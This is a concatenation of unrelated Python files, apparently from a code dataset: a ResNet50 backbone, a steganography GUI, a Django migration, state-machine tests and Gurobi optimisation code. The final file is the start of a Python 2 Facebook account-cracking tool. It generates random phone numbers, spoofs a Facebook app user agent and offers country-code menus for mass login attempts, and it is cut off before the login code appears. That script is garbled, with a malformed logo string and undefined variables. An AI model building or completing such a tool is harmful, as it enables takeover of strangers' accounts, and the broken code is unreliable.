# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"ResNet50 backbone for similarity learning"
import re
from typing import Tuple
from tensorflow.keras import layers
from tensorflow.keras.applications import resnet50
from tensorflow_similarity.layers import MetricEmbedding
from tensorflow_similarity.layers import GeneralizedMeanPooling2D
from tensorflow_similarity.models import SimilarityModel
# Create an image augmentation pipeline.
def ResNet50Sim(
input_shape: Tuple[int],
embedding_size: int = 128,
weights: str = "imagenet",
trainable: str = "frozen",
l2_norm: bool = True,
include_top: bool = True,
pooling: str = "gem",
gem_p=1.0,
) -> SimilarityModel:
"""Build an ResNet50 Model backbone for similarity learning
Architecture from [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385)
Args:
        input_shape: Size of the image input prior to augmentation; it must be
            at least the minimum input size of the ResNet version you use
            (224x224 for ResNet50).
embedding_size: Size of the output embedding. Usually between 64
and 512. Defaults to 128.
weights: Use pre-trained weights - the only available currently being
imagenet. Defaults to "imagenet".
trainable: Make the ResNet backbone fully trainable or partially
trainable.
- "full" to make the entire backbone trainable,
- "partial" to only make the last conv5_block trainable
- "frozen" to make it not trainable.
l2_norm: If True and include_top is also True, then
tfsim.layers.MetricEmbedding is used as the last layer, otherwise
keras.layers.Dense is used. This should be true when using cosine
distance. Defaults to True.
include_top: Whether to include the fully-connected layer at the top
of the network. Defaults to True.
pooling: Optional pooling mode for feature extraction when
include_top is False. Defaults to gem.
- None means that the output of the model will be the 4D tensor
output of the last convolutional layer.
- avg means that global average pooling will be applied to the
output of the last convolutional layer, and thus the output of the
model will be a 2D tensor.
- max means that global max pooling will be applied.
- gem means that global GeneralizedMeanPooling2D will be applied.
The gem_p param sets the contrast amount on the pooling.
gem_p: Sets the power in the GeneralizedMeanPooling2D layer. A value
        of 1.0 is equivalent to GlobalAveragePooling2D, while larger values
        will increase the contrast between activations within each feature
        map, and a value of math.inf is equivalent to global max pooling.
"""
# input
inputs = layers.Input(shape=input_shape)
x = inputs
x = build_resnet(x, weights, trainable)
if include_top:
x = GeneralizedMeanPooling2D(p=gem_p, name="gem_pool")(x)
if l2_norm:
outputs = MetricEmbedding(embedding_size)(x)
else:
outputs = layers.Dense(embedding_size)(x)
else:
if pooling == "gem":
x = GeneralizedMeanPooling2D(p=gem_p, name="gem_pool")(x)
elif pooling == "avg":
x = layers.GlobalAveragePooling2D(name="avg_pool")(x)
elif pooling == "max":
x = layers.GlobalMaxPooling2D(name="max_pool")(x)
outputs = x
return SimilarityModel(inputs, outputs)
def build_resnet(x: layers.Layer, weights: str, trainable: str) -> layers.Layer:
"""Build the requested ResNet.
Args:
x: The input layer to the ResNet.
weights: Use pre-trained weights - the only available currently being
imagenet.
trainable: Make the ResNet backbone fully trainable or partially
trainable.
- "full" to make the entire backbone trainable,
- "partial" to only make the last conv5_block trainable
- "frozen" to make it not trainable.
Returns:
        The output layer of the ResNet model
"""
# init
resnet = resnet50.ResNet50(weights=weights, include_top=False)
if trainable == "full":
resnet.trainable = True
elif trainable == "partial":
# let's mark the top part of the network as trainable
resnet.trainable = True
for layer in resnet.layers:
            # Freeze all the layers before the last 3 blocks
if not re.search("^conv5|^top", layer.name):
layer.trainable = False
# don't change the batchnorm weights
if isinstance(layer, layers.BatchNormalization):
layer.trainable = False
elif trainable == "frozen":
resnet.trainable = False
else:
raise ValueError(
f"{trainable} is not a supported option for 'trainable'."
)
# wire
x = resnet(x)
return x
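

# Minimal usage sketch (added; not part of the original module). The input
# shape and embedding size are illustrative assumptions.
if __name__ == "__main__":
    sim_model = ResNet50Sim(input_shape=(224, 224, 3), embedding_size=128)
    sim_model.summary()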
|
StarcoderdataPython
|
1803863
|
<reponame>SergeyYaroslawzew/ImagesShifrator
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PIL import Image
from PIL.ImageDraw import *
import os
import sys
import gui
class Main(QDialog, gui.Ui_Dialog):
def __init__(self):
super().__init__()
self.setupUi(self)
self.images = "images"
self.results = "results"
self.root = "SHIFRATOR"
for i in os.listdir(f"{self.root}\{self.images}"):
self.comboBox.addItem(i)
self.comboBox.activated[str].connect(self.draw)
self.pushButton.clicked.connect(self.encrypt)
self.pushButton_1.clicked.connect(self.decrypt)
def draw(self):
self.file = f"{self.root}\{self.images}\{self.comboBox.currentText()}"
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
pixmap = QPixmap(self.file)
self.label_2.setPixmap(pixmap)
else:
self.label_2.setText("NO SUCH FILE")
def binmessage(self,data):
binmes = []
for i in data:
binmes.append(format(ord(i.encode('cp1251')), '08b'))
return binmes
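
    # Added summary of the LSB scheme implemented below: each character is
    # turned into 8 bits; encoding a character consumes three RGB pixels
    # (9 channel values). The first 8 values carry the bits in their parity
    # (even = 0, odd = 1) and the 9th value's parity signals whether the
    # message continues (even) or ends (odd).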
def NewPix(self,pix,data):
datalist = self.binmessage(data)
lendata = len(datalist)
imdata = iter(pix)
for i in range(lendata):
pix = [value for value in imdata.__next__()[:3] +
imdata.__next__()[:3] +
imdata.__next__()[:3]]
for j in range(0, 8):
                if (datalist[i][j] == '0') and (pix[j] % 2 != 0):
                    pix[j] -= 1
elif (datalist[i][j] == '1') and (pix[j] % 2 == 0):
pix[j] -= 1
if (i == lendata - 1):
if (pix[-1] % 2 == 0):
pix[-1] -= 1
else:
if (pix[-1] % 2 != 0):
pix[-1] -= 1
pix = tuple(pix)
yield pix[0:3]
yield pix[3:6]
yield pix[6:9]
def encode(self,data):
image = Image.open(self.file, 'r')
self.newname = f"#{self.comboBox.currentText()}"
newimg = image.copy()
w = newimg.size[0]
(x, y) = (0, 0)
for pixel in self.NewPix(newimg.getdata(),data):
newimg.putpixel((x, y), pixel)
if (x == w - 1):
x = 0
y += 1
else:
x += 1
newimg.save(f"{self.root}\{self.results}\{self.newname}")
def encrypt(self):
data = self.lineEdit.text()
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
if self.lineEdit.text() == "":
self.label_2.setText("PLEASE ENTER A MESSAGE")
else:
self.draw()
self.encode(data)
else:
self.label_2.setText("NO SUCH FILE")
def decode(self):
image = Image.open(self.file, 'r')
imgdata = iter(image.getdata())
data = ''
while (True):
pixels = [value for value in imgdata.__next__()[:3] +
imgdata.__next__()[:3] +
imgdata.__next__()[:3]]
binstr = ''
for i in pixels[:8]:
if (i % 2 == 0):
binstr += '0'
else:
binstr += '1'
data += chr(int(binstr, 2))
if (pixels[-1] % 2 != 0):
data = str(data)
data = data.encode('cp1252').decode('cp1251')
return self.lineEdit.setText(f'{data}')
def decrypt(self):
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
self.draw()
self.decode()
else:
self.label_2.setText("NO SUCH FILE")
if __name__ == '__main__':
app = QApplication(sys.argv)
form = Main()
form.show()
app.exec()
|
StarcoderdataPython
|
1995298
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-23 11:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('offer', '0004_auto_20170415_1518'),
]
operations = [
migrations.AlterField(
model_name='conditionaloffer',
name='benefit',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='offers', to='offer.Benefit', verbose_name='Benefit'),
),
migrations.AlterField(
model_name='conditionaloffer',
name='condition',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='offers', to='offer.Condition', verbose_name='Condition'),
),
]
|
StarcoderdataPython
|
8015231
|
<reponame>thread/routemaster
from unittest import mock
import pytest
from freezegun import freeze_time
from requests.exceptions import RequestException
from routemaster import state_machine
from routemaster.db import Label
from routemaster.state_machine import (
LabelRef,
DeletedLabel,
UnknownLabel,
UnknownStateMachine,
)
from routemaster.state_machine.gates import process_gate
def metadata_triggers_processed(app, label):
with app.new_session():
return app.session.query(
Label.metadata_triggers_processed,
).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
def test_label_get_state(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{'foo': 'bar'},
)
with app.new_session():
assert state_machine.get_label_state(app, label).name == 'start'
def test_label_get_state_raises_for_unknown_label(app):
label = LabelRef('unknown', 'test_machine')
with pytest.raises(UnknownLabel), app.new_session():
assert state_machine.get_label_state(app, label)
def test_label_get_state_raises_for_unknown_state_machine(app):
label = LabelRef('foo', 'unknown_machine')
with pytest.raises(UnknownStateMachine), app.new_session():
assert state_machine.get_label_state(app, label)
def test_state_machine_simple(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
state_machine.update_metadata_for_label(
app,
label,
{'foo': 'bar'},
)
with app.new_session():
assert state_machine.get_label_metadata(app, label) == {'foo': 'bar'}
def test_update_metadata_for_label_raises_for_unknown_state_machine(app):
label = LabelRef('foo', 'nonexistent_machine')
with pytest.raises(UnknownStateMachine), app.new_session():
state_machine.update_metadata_for_label(app, label, {})
def test_state_machine_progresses_on_update(app, mock_webhook, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_webhook() as webhook, mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
webhook.assert_called_once()
assert metadata_triggers_processed(app, label) is True
assert current_state(label) == 'end'
def test_state_machine_progresses_automatically(app, mock_webhook, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_webhook() as webhook, mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{'should_progress': True},
)
webhook.assert_called_once()
assert current_state(label) == 'end'
def test_state_machine_does_not_progress_when_not_eligible(app, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': False},
)
assert current_state(label) == 'start'
def test_stays_in_gate_if_gate_processing_fails(app, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_test_feed(), mock.patch(
'routemaster.context.Context._pre_warm_feeds',
side_effect=RequestException,
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert metadata_triggers_processed(app, label) is False
assert current_state(label) == 'start'
def test_concurrent_metadata_update_gate_evaluations_dont_race(create_label, app, assert_history, current_state):
test_machine_2 = app.config.state_machines['test_machine_2']
gate_1 = test_machine_2.states[0]
label = create_label('foo', 'test_machine_2', {})
with app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert current_state(label) == 'gate_2'
with mock.patch(
'routemaster.state_machine.api.needs_gate_evaluation_for_metadata_change',
return_value=(True, gate_1),
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert_history([
(None, 'gate_1'),
('gate_1', 'gate_2'),
])
def test_metadata_update_gate_evaluations_dont_process_subsequent_metadata_triggered_gate(create_label, app, assert_history, current_state):
label = create_label('foo', 'test_machine_2', {})
with app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert current_state(label) == 'gate_2'
assert_history([
(None, 'gate_1'),
('gate_1', 'gate_2'),
# Note: has not progressed to end because there is no on entry trigger
# on gate 2 and we were not processing a metadata trigger on gate 2,
# only gate 1.
])
def test_metadata_update_gate_evaluations_dont_race_processing_subsequent_metadata_triggered_gate(create_label, app, assert_history):
test_machine_2 = app.config.state_machines['test_machine_2']
gate_1 = test_machine_2.states[0]
gate_2 = test_machine_2.states[1]
label = create_label('foo', 'test_machine_2', {})
with mock.patch(
'routemaster.state_machine.api.needs_gate_evaluation_for_metadata_change',
return_value=(True, gate_1),
), mock.patch(
'routemaster.state_machine.api.get_current_state',
return_value=gate_2,
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
# We should have no history entry 1->2 (as we mocked out the current state)
# so the state machine should have considered us up-to-date and not moved.
assert_history([
(None, 'gate_1'),
])
def test_maintains_updated_field_on_label(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
first_updated = app.session.query(
Label.updated,
).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
with mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'foo': 'bar'},
)
second_updated = app.session.query(
Label.updated,
).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
assert second_updated > first_updated
def test_continues_after_time_since_entering_gate(app, current_state):
label = LabelRef('foo', 'test_machine_timing')
gate = app.config.state_machines['test_machine_timing'].states[0]
with freeze_time('2018-01-24 12:00:00'), app.new_session():
state_machine.create_label(
app,
label,
{},
)
# 1 day later, not enough to progress
with freeze_time('2018-01-25 12:00:00'), app.new_session():
process_gate(
app=app,
state=gate,
state_machine=state_machine,
label=label,
)
assert current_state(label) == 'start'
# 2 days later
with freeze_time('2018-01-26 12:00:00'), app.new_session():
process_gate(
app=app,
state=gate,
state_machine=state_machine,
label=label,
)
assert current_state(label) == 'end'
def test_delete_label(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
assert_history([
(None, 'start'),
('start', None),
])
def test_delete_label_idempotent(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.delete_label(app, label_foo)
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
assert_history([
(None, 'start'),
('start', None),
])
def test_delete_label_only_deletes_target_label(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
label_bar = LabelRef('bar', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.create_label(app, label_bar, {})
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
state_machine.get_label_metadata(
app,
label_bar,
)
def test_handles_label_state_change_race_condition(app, create_deleted_label):
test_machine = app.config.state_machines['test_machine']
state = test_machine.states[1]
# Create a label which is not in the expected state. Doing this and then
# returning the affected label from the `get_labels` call is easier and
# equivalent to having the state of the label change between the return of
# that call and when the label is used.
label = create_deleted_label('foo', 'test_machine')
mock_processor = mock.Mock()
mock_get_labels = mock.Mock(return_value=[label.name])
with mock.patch(
'routemaster.state_machine.api.suppress_exceptions',
):
state_machine.process_cron(
mock_processor,
mock_get_labels,
app,
test_machine,
state,
)
# Assert no attempt to process the label
mock_processor.assert_not_called()
|
StarcoderdataPython
|
6664529
|
from litex.soc.cores.cpu.blackparrot.core import BlackParrot
|
StarcoderdataPython
|
3438788
|
from gurobipy import GRB, quicksum
import gurobipy as gp
def get_core_gurobi_model(space, add_model_core=None):
"""Add core to gurobi model, i.e. bounds, variables and parameters.
Parameters
----------
space : scikit-optimize object
Captures the feature space
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
if add_model_core is None:
model = gp.Model()
x_lb = [bound[0] for bound in space.bounds]
x_ub = [bound[1] for bound in space.bounds]
model._c_x_lb = x_lb
model._c_x_ub = x_ub
n_features = len(x_lb)
feature_numbers = range(n_features)
model._n_feat = n_features
model._c_x = \
model.addVars(feature_numbers,
lb=x_lb,
ub=x_ub, name="c_x", vtype='C')
model.update()
return model
else:
# validate model core input
assert type(add_model_core) is gp.Model, \
"wrong model core type given, please create model core using: " + \
"entmoot.optimizer.gurobi_utils.add_core_to_gurobi_model(..."
check_attributes = \
hasattr(add_model_core,"_c_x_lb") and \
hasattr(add_model_core,"_c_x_ub") and \
hasattr(add_model_core,"_n_feat") and \
hasattr(add_model_core,"_c_x")
assert check_attributes, \
"model core was not configured correctly, please create model core using: " + \
"entmoot.optimizer.gurobi_utils.add_core_to_gurobi_model(..."
return add_model_core
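
# Illustrative usage sketch (added; the space definition below is an
# assumption, not taken from the original module):
#
#   from skopt.space import Space
#   space = Space([(0.0, 1.0), (-2.0, 2.0)])
#   core = get_core_gurobi_model(space)   # fresh gurobipy.Model with c_x vars
#   core._c_x[0].LB = 0.25                # bounds can still be tightened here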
def add_std_to_gurobi_model(est, model):
"""Adds standard estimator formulation to gurobi model.
Parameters
----------
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
est.std_estimator.add_to_gurobi_model(model)
model.update()
def set_gurobi_init_to_ref(est, model):
"""Sets intial values of gurobi model variables to the reference points.
Parameters
----------
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
ref_points_unscaled = \
est.std_estimator.ref_points_unscaled
best_val = est.predict(ref_points_unscaled[0].reshape(1, -1))
best_ref = ref_points_unscaled[0]
for ref_point in ref_points_unscaled:
temp_val = est.predict(ref_point.reshape(1, -1))
if best_val > temp_val:
best_val = temp_val
best_ref = ref_point
n_features = len(model._c_x)
for i in range (n_features):
model._c_x[i].start = best_ref[i]
model._alpha.start = 0.0
model.update()
def add_acq_to_gurobi_model(model, est, acq_func="LCB", acq_func_kwargs=None):
"""Sets gurobi model objective function to acquisition function.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
acq_func : str
Type of acquisition function used for gurobi model objective
acq_func_kwargs : dict
Allows additional parameter settings for acquisition function
Returns
-------
-
"""
# check inputs
if acq_func_kwargs is None:
acq_func_kwargs = dict()
# read kappa parameter
kappa = acq_func_kwargs.get("kappa", 1.96)
# collect objective contribution for tree model and std estimator
mu, std = get_gurobi_obj(
model, est, return_std=True, acq_func_kwargs=acq_func_kwargs
)
ob_expr = quicksum((mu, kappa*std))
model.setObjective(ob_expr,GRB.MINIMIZE)
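
# Note (added for clarity): the objective assembled above is the lower
# confidence bound LCB(x) = mu(x) + kappa * std(x), minimized by Gurobi;
# kappa defaults to 1.96 unless overridden via acq_func_kwargs["kappa"].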
def get_gurobi_obj(model, est, return_std=False, acq_func_kwargs=None):
"""Returns gurobi model objective contribution of tree model and std
estimator.
Returns tree model objective contribution if `return_std` is set to False.
If `return_std` is set to True, then return tree model and std estimator
contribution to gurobi model objective.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
return_std : bool
Set `True` to return both tree model and std estimator contribution
Returns
-------
mean or (mean, std): gurobipy.expr, or tuple(gurobipy.expr, gurobipy.expr),
depending on value of `return_std`.
"""
scaled = acq_func_kwargs.get("scaled", False)
mean = get_gbm_obj(model)
if return_std:
std = est.std_estimator.get_gurobi_obj(model, scaled=scaled)
return mean, std
return mean
def get_gbm_obj(model):
"""Returns objective of `gbm_model` specified in gurobi model.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
Returns
-------
ob_expr: gurobipy.expr
Defines the gurobipy expression corresponding to the tree model objective
contribution.
"""
weighted_sum = quicksum(
model._leaf_weight(label, tree, leaf) * \
model._z_l[label, tree, leaf]
for label, tree, leaf in leaf_index(model)
)
ob_expr = weighted_sum
return ob_expr
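
# Note (added for clarity): the tree-model contribution above is
#   sum over (label, tree, leaf) of leaf_weight * z_l[label, tree, leaf],
# i.e. the usual leaf-weight sum with z_l selecting the active leaf per tree.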
### GBT HANDLER
## gbt model helper functions
def tree_index(model):
for label in model._gbm_set:
for tree in range(model._num_trees(label)):
yield (label, tree)
tree_index.dimen = 2
def leaf_index(model):
for label, tree in tree_index(model):
for leaf in model._leaves(label, tree):
yield (label, tree, leaf)
leaf_index.dimen = 3
def misic_interval_index(model):
for var in model._breakpoint_index:
for j in range(len(model._breakpoints(var))):
yield (var, j)
misic_interval_index.dimen = 2
def misic_split_index(model):
gbm_models = model._gbm_models
for label, tree in tree_index(model):
for encoding in gbm_models[label].get_branch_encodings(tree):
yield (label, tree, encoding)
misic_split_index.dimen = 3
def alt_interval_index(model):
for var in model.breakpoint_index:
for j in range(1, len(model.breakpoints[var])+1):
yield (var, j)
alt_interval_index.dimen = 2
def add_gbm_to_gurobi_model(gbm_model_dict, model):
add_gbm_parameters(gbm_model_dict, model)
add_gbm_variables(model)
add_gbm_constraints(model)
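
# Summary (added for clarity): the helpers below appear to follow the
# Misic-style MIP encoding of gradient-boosted trees: z_l variables select
# exactly one leaf per tree, y[var, j] are ordered interval indicators per
# split point, and the left/right split constraints tie leaf selection to
# those indicators.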
def add_gbm_parameters(gbm_model_dict, model):
model._gbm_models = gbm_model_dict
model._gbm_set = set(gbm_model_dict.keys())
model._num_trees = lambda label: \
gbm_model_dict[label].n_trees
model._leaves = lambda label, tree: \
tuple(gbm_model_dict[label].get_leaf_encodings(tree))
model._leaf_weight = lambda label, tree, leaf: \
gbm_model_dict[label].get_leaf_weight(tree, leaf)
vbs = [v.get_var_break_points() for v in gbm_model_dict.values()]
all_breakpoints = {}
for i in range(model._n_feat):
s = set()
for vb in vbs:
try:
s = s.union(set(vb[i]))
except KeyError:
pass
if s:
all_breakpoints[i] = sorted(s)
model._breakpoint_index = list(all_breakpoints.keys())
model._breakpoints = lambda i: all_breakpoints[i]
model._leaf_vars = lambda label, tree, leaf: \
tuple(i
for i in gbm_model_dict[label].get_participating_variables(
tree, leaf))
def add_gbm_variables(model):
model._z_l = model.addVars(
leaf_index(model),
lb=0,
ub=GRB.INFINITY,
name="z_l", vtype='C'
)
model._y = model.addVars(
misic_interval_index(model),
name="y",
vtype=GRB.BINARY
)
model.update()
def add_gbm_constraints(model):
def single_leaf_rule(model_, label, tree):
z_l, leaves = model_._z_l, model_._leaves
return (quicksum(z_l[label, tree, leaf]
for leaf in leaves(label, tree))
== 1)
model.addConstrs(
(single_leaf_rule(model, label, tree)
for (label,tree) in tree_index(model)),
name="single_leaf"
)
def left_split_r(model_, label, tree, split_enc):
gbt = model_._gbm_models[label]
split_var, split_val = gbt.get_branch_partition_pair(
tree,
split_enc
)
y_var = split_var
y_val = model_._breakpoints(y_var).index(split_val)
return quicksum(
model_._z_l[label, tree, leaf]
for leaf in gbt.get_left_leaves(tree, split_enc)
) <= model_._y[y_var, y_val]
def right_split_r(model_, label, tree, split_enc):
gbt = model_._gbm_models[label]
split_var, split_val = gbt.get_branch_partition_pair(
tree,
split_enc
)
y_var = split_var
y_val = model_._breakpoints(y_var).index(split_val)
return quicksum(
model_._z_l[label, tree, leaf]
for leaf in gbt.get_right_leaves(tree, split_enc)
) <= 1 - model_._y[y_var, y_val]
    def y_order_r(model_, i, j):
        # `Constraint.Skip` is a Pyomo name that is undefined in this module;
        # the branch is unreachable, though, because the caller already filters
        # out the last breakpoint index.
        if j == len(model_._breakpoints(i)):
            return Constraint.Skip
        return model_._y[i, j] <= model_._y[i, j+1]
def var_lower_r(model_, i, j):
lb = model_._c_x[i].lb
j_bound = model_._breakpoints(i)[j]
return model_._c_x[i] >= lb + (j_bound - lb)*(1-model_._y[i, j])
def var_upper_r(model_, i, j):
ub = model_._c_x[i].ub
j_bound = model_._breakpoints(i)[j]
return model_._c_x[i] <= ub + (j_bound - ub)*(model_._y[i, j])
model.addConstrs(
(left_split_r(model, label, tree, encoding)
for (label, tree, encoding) in misic_split_index(model)),
name="left_split"
)
model.addConstrs(
(right_split_r(model, label, tree, encoding)
for (label, tree, encoding) in misic_split_index(model)),
name="right_split"
)
model.addConstrs(
(y_order_r(model, var, j)
for (var, j) in misic_interval_index(model)
if j != len(model._breakpoints(var))-1),
name="y_order"
)
model.addConstrs(
(var_lower_r(model, var, j)
for (var, j) in misic_interval_index(model)),
name="var_lower"
)
model.addConstrs(
(var_upper_r(model, var, j)
for (var, j) in misic_interval_index(model)),
name="var_upper"
)
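# --- Editor's note / hedged usage sketch (not part of the original module) ---
# The constraints above implement a Misic-style MIP embedding of gradient-boosted
# trees: single_leaf forces exactly one active leaf per tree, y_order makes the
# binary interval variables non-decreasing along each feature's sorted breakpoints,
# left_split/right_split tie the active leaves to the side of each split implied
# by y, and var_lower/var_upper link y back to the continuous variables _c_x.
# A minimal call sequence, assuming the caller sets `_n_feat` / `_c_x` and has GBM
# wrapper objects exposing the interface used above (n_trees, get_leaf_encodings,
# get_branch_encodings, ...), might look like this (names are illustrative only):
#
#   from gurobipy import Model
#   m = Model("gbm_embedding")
#   m._n_feat = n_features                            # assumption: set by the caller
#   m._c_x = m.addVars(range(n_features), lb=0.0, ub=1.0, name="x")
#   add_gbm_to_gurobi_model({"out": gbm_wrapper}, m)  # gbm_wrapper is hypothetical
#   m.optimize()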
|
StarcoderdataPython
|
11340635
|
#!/usr/bin/python2
#coding=utf-8
#Author <NAME>
#Ngapain??
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### LOGO #####
lo
\033[1;97m░█████╗░ ░█████╗░███╗░░██╗██╗░░░██╗
\033[1;97m██╔══██╗ ██╔══██╗████╗░██║██║░░░██║
\033[1;97m███████║ ███████║██╔██╗██║██║░░░██║
\033[1;97m██╔══██║ ██╔══██║██║╚████║██║░░░██║
\033[1;97m██║░░██║ ██║░░██║██║░╚███║╚██████╔╝
\033[1;97m╚═╝░░╚═╝ ╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m ASHIK & LEJON KHAN OFFICIAL
\033[1;97m--------------------------------------------------
\033[1;97m➣ Author : <NAME>
\033[1;97m➣ Version : V1.1.1
\033[1;97m➣ Facebook :www.facebook.com/aashikbanaya.aa10
\033[1;97m➣ Help : Any Help Contact Me On Facebook.
\033[1;97m--------------------------------------------------
'''
correctname = ASHIK
CorrectPassword = <PASSWORD>
os.system('clear')
print logo
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m➣ Username Tools : ")
if (username == CorrectUsername):
password = raw_input("\033[1;97m➣ Password Tools : ")
if (password == CorrectPassword):
print "[✓] Logged in successfully as \n " + username
loop = 'false'
else:
print "Wrong Password"
else:
print "Wrong Username"
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print '\033[1;97m[1]\033[1;97m Bangladesh'
print '\033[1;97m[2]\033[1;97m USA'
print '\033[1;97m[3]\033[1;97m UK'
print '\033[1;97m[4] \033[1;97m India'
print '\033[1;97m[5]\033[1;97m Brazil'
print '\033[1;97m[6]\033[1;97m Japan'
print '\033[1;97m[7]\033[1;97m Korea'
print '\033[1;97m[8]\033[1;97m Italy'
print '\033[1;97m[9]\033[1;97m Spain'
print '\033[1;97m[10]\033[1;97m Poland'
print '\033[1;97m[11]\033[1;97m Pakistan'
print '\033[1;97m[12]\033[1;97m Indonesia'
print '\033[1;97m[13]\033[1;97m Iran'
print '\033[1;97m[14]\033[1;97m Grecee'
print '\033[1;97m[0] Exit '
print "\033[1;97m--------------------------------------------------\n"
action()
def action():
bch = raw_input('\n\033[1;97m▄︻̷̿┻̿═━一 ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print("\033[1;97m175,165,191,192,193,194,195,196,197,198,199")
try:
c = raw_input("\033[1;97m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print("786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print("737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" choose code : ")
k="+44"
idlist = ('.txt')
